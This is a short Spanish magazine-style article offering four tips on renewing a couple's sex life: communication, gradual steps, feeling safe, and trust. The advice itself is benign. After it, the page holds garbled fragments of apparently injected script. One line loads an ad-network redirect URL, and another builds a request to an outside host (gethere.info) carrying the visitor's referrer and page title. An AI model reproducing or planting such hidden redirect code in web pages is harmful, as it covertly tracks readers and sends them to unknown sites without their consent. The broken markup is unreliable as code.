4 pasos para innovar en la cama con tu pareja

Por Elizabeth Palacios    @ely__palacios

La sexualidad es un aspecto que jamás debes dejar caer en la monotonía, por lo que es normal que periódicamente estés en busca de experimentar sensaciones nuevas.

Sin embargo, es necesario que tengas en cuenta algunos consejos para pedir a tu pareja que renueven la pasión.

 

Comunicación

La comunicación en pareja es fundamental para poder llegar a acuerdos libres de malentendidos, si deseas experimentar nuevas cosas a nivel sexual, es importante que no temas decirle tus deseos.

Lo adecuado sería que fueras directo, pero sin intimidarla, haciéndola sentir segura y tu cómplice en todas tus fantasías para que ambos disfruten de las novedades en su sexualidad.

Paso a paso

Si lo que deseas es algo muy atrevido a comparación de la cotidianeidad de su relación de pareja, te recomendamos que vayas poco a poco, que comiences pidiéndole cosas sencillas hasta que ambos estén en el mismo mood y puedas pedirle lo que sea sin que se saque de onda, sino que también le excite la idea.

Seguros

Es importante que se sientan seguros el uno del otro, sea lo que sea que deseen realizar, el sentimiento de confianza y seguridad en el otro es algo que no debe fallar.

Confía en tu pareja

Confiar en tu pareja hará que todo sea más fácil y placentero, cuando existe confianza plena en el otro, lo único que importa es disfrutar del placer sin rollos existenciales ni nada que opaque el momento.

< src="https://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:||
Comentarios